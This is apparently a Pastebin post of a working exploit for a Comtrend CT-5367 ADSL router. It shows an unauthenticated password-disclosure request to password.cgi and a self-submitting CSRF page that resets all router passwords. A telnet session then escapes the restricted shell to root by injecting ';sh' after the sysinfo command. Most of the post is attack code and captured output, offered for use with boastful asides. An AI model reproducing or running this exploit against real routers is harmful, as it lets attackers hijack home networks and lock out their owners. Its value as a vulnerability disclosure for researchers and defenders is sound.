Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root
- =============================================================================
- Board ID : 96338A-122
- Software : A111-312BTC-C01_R12
- Bootloader : 1.0.37-12.1-1
- Wireless Driver : 4.170.16.0.cpe2.1sd
- ADSL : A2pB023k.d20k_rc2
- =============================================================================
- Type : HardWare
- Risk of use : High
- Type to use : Remote
- Discovered by : Todor Donev
- Author Email : todor.donev@gmail.com
- =============================================================================
- Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,
- and all my other friends that support me a lot of times for everything !!
- */
- root@linux:~# get.pl http://192.168.1.1/
- /*HTTP/1.1 401 Unauthorized
- Cache-Control: no-cache
- Connection: close
- Date: Sat, 01 Jan 2000 00:04:31 GMT
- Server: micro_httpd ## Yeah !! Bite me :(
- WWW-Authenticate: Basic realm="DSL Router"
- Content-Type: text/html
- <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
- <BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
- Authorization required.
- <HR>
- <ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>
- </BODY></HTML>
- */
- root@linux:~# get.pl http://192.168.1.1/password.cgi ## Information Disclosure
- /*HTTP/1.1 200 Ok
- Cache-Control: no-cache
- Connection: close
- Date: Mon, 03 Jan 2000 23:01:25 GMT
- Server: micro_httpd
- Content-Type: text/html
- <html>
- <head>
- <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
- <link rel="stylesheet" href='stylemain.css' type='text/css'>
- <link rel="stylesheet" href='colors.css' type='text/css'>
- <script language="javascript" src="util.js"></script>
- <script language="javascript">
- <!-- hide -->\n ## Dammit! =))
- pwdAdmin = '<CENSORED>'; ## Censored Password
- pwdSupport = '<CENSORED>'; ## Censored Password
- pwdUser = '<CENSORED>';\n ## Censored Password
- */
- [CUT EXPLOIT HERE] ## CSRF For Change All passwords
- <html>
- <head></head>
- <title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>
- <body onLoad=javascript:document.form.submit()>
- <form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
- <input type="hidden" name="sptPassword" value="shpek">
- <input type="hidden" name="usrPassword" value="shpek">
- <input type="hidden" name="sysPassword" value="shpek">
- </form>
- </body>
- </html>
- [CUT EXPLOIT HERE]
- root@linux:~# telnet 192.168.1.1
- ADSL Router Model CT-5367 Sw.Ver. C01_R12
- Login: root
- Password:
- ## BINGOO !! Godlike =))
- > ?
- ?
- help
- logout
- reboot
- adsl
- atm
- ddns
- dumpcfg
- ping
- siproxd
- sntp
- sysinfo
- tftp
- wlan
- version
- build
- ipfilter
- > sysinfo
- Number of processes: 30
- 11:46pm up 2 days, 23:46,
- load average: 1 min:0.12, 5 min:0.05, 15 min:0.09
- total used free shared buffers
- Mem: 14012 13028 984 0 588
- Swap: 0 0 0
- Total: 14012 13028 984
- > sysinfo ;sh ## JAILBREAK !! FirmWare sucks :)
- Number of processes: 30
- 11:47pm up 2 days, 23:47,
- load average: 1 min:0.07, 5 min:0.05, 15 min:0.08
- total used free shared buffers
- Mem: 14012 13024 988 0 588
- Swap: 0 0 0
- Total: 14012 13024 988
- BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)
- Enter 'help' for a list of built-in commands.
- # cat /proc/version
- Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009
- # ps
- PID Uid VmSize Stat Command
- 1 root 280 S init
- 2 root SWN [ksoftirqd/0]
- 3 root SW< [events/0]
- 4 root SW< [khelper]
- 5 root SW< [kblockd/0]
- 15 root SW [pdflush]
- 16 root SW [pdflush]
- 17 root SW [kswapd0]
- 18 root SW< [aio/0]
- 23 root SW [mtdblockd]
- 32 root 328 S -sh
- 65 root 1384 S cfm
- 72 root SW [bcmsw]
- 192 root 216 S pvc2684d
- 275 root 496 S nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A
- 342 root 304 S dhcpd
- 596 root 1384 S CT_Polling
- 600 root 432 S pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p
- 931 root 248 S dhcpc -i nas_0_0_40
- 993 root 316 S dproxy -D btc-adsl
- 997 root 352 S upnp -L br0 -W ppp_0_0_35_1 -D
- 1013 root 512 S siproxd --config /var/siproxd/siproxd.conf
- 1014 root 512 S siproxd --config /var/siproxd/siproxd.conf
- 1015 root 512 S siproxd --config /var/siproxd/siproxd.conf
- 10745 root 292 S syslogd -C -l 7
- 10747 root 256 S klogd
- 6616 root 1396 S telnetd
- 6618 root 1428 S telnetd
- 6673 root 284 S sh -c sysinfo ;sh
- 6724 root 284 R ps
- # top
- Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached
- Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting)
- PID USER STATUS RSS PPID %CPU %MEM COMMAND
- 6751 root R 288 6675 0.7 2.0 exe
- 2 root SWN 0 1 0.3 0.0 ksoftirqd/0
- 6616 root S 1396 65 0.1 9.9 telnetd
- 931 root S 248 1 0.1 1.7 dhcpc
- 6618 root S 1428 6616 0.0 10.1 telnetd
- 65 root S 1384 32 0.0 9.8 cfm
- 596 root S 1384 65 0.0 9.8 CT_Polling
- 1013 root S 512 1 0.0 3.6 siproxd
- 1014 root S 512 1013 0.0 3.6 siproxd
- 1015 root S 512 1014 0.0 3.6 siproxd
- 275 root S 496 1 0.0 3.5 nas
- 600 root S 432 1 0.0 3.0 pppd
- 997 root S 352 1 0.0 2.5 upnp
- 32 root S 328 1 0.0 2.3 sh
- 993 root S 316 1 0.0 2.2 dproxy
- 6675 root S 316 6673 0.0 2.2 exe
- 342 root S 304 1 0.0 2.1 dhcpd
- 10745 root S 292 1 0.0 2.0 exe
- 6673 root S 284 6618 0.0 2.0 sh
- 1 root S 280 0 0.0 1.9 init
- # echo * ## ls o.O?!?
- bin dev etc lib linuxrc mnt proc sbin usr var webs
- #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement